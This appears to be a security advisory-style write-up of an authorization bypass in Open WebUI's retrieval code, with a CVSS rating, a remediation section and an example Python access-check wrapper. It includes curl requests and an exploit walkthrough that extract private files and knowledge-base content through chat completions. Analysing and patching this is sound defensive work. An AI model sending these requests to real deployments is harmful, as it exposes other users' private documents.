The vulnerability lies in the `get_sources_from_items` function within `backend/open_webui/retrieval/utils.py` (lines 963-965, 1063-1068, 1126-1131). Three of five code paths that resolve file and knowledge base references into vector search queries lack authorization checks. The affected paths are:
- `type: "file"` with non-full-context (default): lines 1063-1068, no access check.
- `type: "text"` with `collection_name`: lines 963-965, no access check.
- Bare `collection_name` / `collection_names`: lines 1126-1131, no access check.
These paths pass user-supplied collection names directly to `query_collection()`, which queries the vector store without verifying that the user has permission. Collection names follow predictable formats: a `file-` prefix for files, and for knowledge bases the ID itself, as in `{"type": "text", "collection_name": "<knowledge_base_id>"}`. Access revocation via `has_access_to_file` is bypassed because the unprotected paths never call it. The CVSS 3.1 score is High (7.5) due to Network attack vector, Low complexity, Low privileges required, No user interaction, and High confidentiality impact.
Platform: Open WebUI
Version: main (6fdd19bf1)
Vulnerability: RAG authorization bypass
Severity: High
Date: 2026-05-08
Prediction: 2026-06-15
What Undercode Say:
```bash
# Identify vector store collections
curl -X GET "http://target/api/vector/collections" -H "Authorization: Bearer $TOKEN"

# Extract file content via RAG chat completion
curl -X POST "http://target/api/chat/completions" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "gpt-3.5-turbo",
    "messages": [{"role": "user", "content": "Show full document content"}],
    "files": [{"type": "file", "id": "target_file_id"}]
  }'

# Attack using knowledge base UUID
curl -X POST "http://target/api/chat/completions" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"model":"any","messages":[{"role":"user","content":"List all knowledge"}],"files":[{"type":"text","collection_name":"550e8400-e29b-41d4-a716-446655440000"}]}'

# Check unprotected code path in source
grep -n "query_collection" backend/open_webui/retrieval/utils.py
```
Exploit:
The attacker needs a valid account and a target resource ID (file or knowledge base). They send a chat completion request with a `files` array containing `{"type":"file","id":"<file_id>"}` or `{"type":"text","collection_name":"<uuid>"}`. The default non-full-context path triggers a direct vector query without calling `has_access_to_file`. The returned embedding chunks are fed to the LLM, which outputs the stolen content. Access revocation is ineffective; once the ID is known, extraction works indefinitely.
Protection from this CVE
Add authorization checks in all three unprotected code paths before calling `query_collection()`. For `type: "file"` non-full-context, call `has_access_to_file(file_id, user_id)`. For `type: "text"` with `collection_name` and for bare `collection_name`, validate that the user has explicit permission to that knowledge base or that the collection corresponds to a file the user can access. Implement a centralized access wrapper `authorized_query_collection(collection_name, user)` that enforces these checks. Update to the commit containing the patch once it is available.
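One way to build the centralized wrapper described above, as an added example rather than Open WebUI's own code. The in-memory ACL tables, `has_access_to_knowledge`, `resolve_items` and the stubbed `query_collection` are assumptions made so it runs stand-alone, and `has_access_to_file` is a stand-in using the signature given above.

```python
# Added example; FILE_ACL, KB_ACL, VECTORS and query_collection() are constructed
# stand-ins for the application's real stores, not Open WebUI code.
FILE_PREFIX = "file-"
FILE_ACL = {"f1": {"alice"}, "f2": {"alice", "bob"}}  # file id -> allowed user ids
KB_ACL = {"kb1": {"alice"}}                            # knowledge base id -> allowed user ids
VECTORS = {"file-f1": ["alice notes"], "file-f2": ["shared roadmap"], "kb1": ["hr handbook"]}

class AccessDenied(Exception):
    pass

def has_access_to_file(file_id, user_id):
    return user_id in FILE_ACL.get(file_id, set())

def has_access_to_knowledge(kb_id, user_id):  # hypothetical helper name
    return user_id in KB_ACL.get(kb_id, set())

def query_collection(collection_name, query):
    # Stand-in for the vector search: returns every chunk in the collection.
    return list(VECTORS.get(collection_name, []))

def authorized_query_collection(collection_name, query, user_id):
    """Map the collection to its owning resource and check access before querying."""
    if not isinstance(collection_name, str) or not collection_name:
        raise AccessDenied("invalid collection name")
    if collection_name.startswith(FILE_PREFIX):
        allowed = has_access_to_file(collection_name[len(FILE_PREFIX):], user_id)
    else:
        allowed = has_access_to_knowledge(collection_name, user_id)
    if not allowed:  # unknown collections are denied as well (deny by default)
        raise AccessDenied(f"{user_id!r} may not query this collection")
    return query_collection(collection_name, query)

def resolve_items(items, query, user_id):
    """Send all three item shapes named in the write-up through the one wrapper."""
    chunks, denied = [], []
    for item in items:
        if item.get("type") == "file":
            names = [FILE_PREFIX + str(item.get("id", ""))]
        elif item.get("collection_name"):
            names = [item["collection_name"]]
        else:
            names = item.get("collection_names", [])
        for name in names:
            try:
                chunks += authorized_query_collection(name, query, user_id)
            except AccessDenied:
                denied.append(name)  # record for audit logging instead of failing open
    return chunks, denied
```

Because the ACL is consulted on every query, removing a user from a share takes effect on the next request, which is the revocation property the unprotected paths lack.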
Impact
- Private file and knowledge base content fully extractable by any authenticated user who obtains a resource ID.
- Access revocation (removing share permissions) does not stop RAG extraction – previously authorized users retain indefinite access.
- Complete breakdown of Open WebUI’s access control model for RAG-enabled documents.
- Confidentiality impact is High; attackers can systematically dump entire vector stores.
Sources:
Reported By: github.com

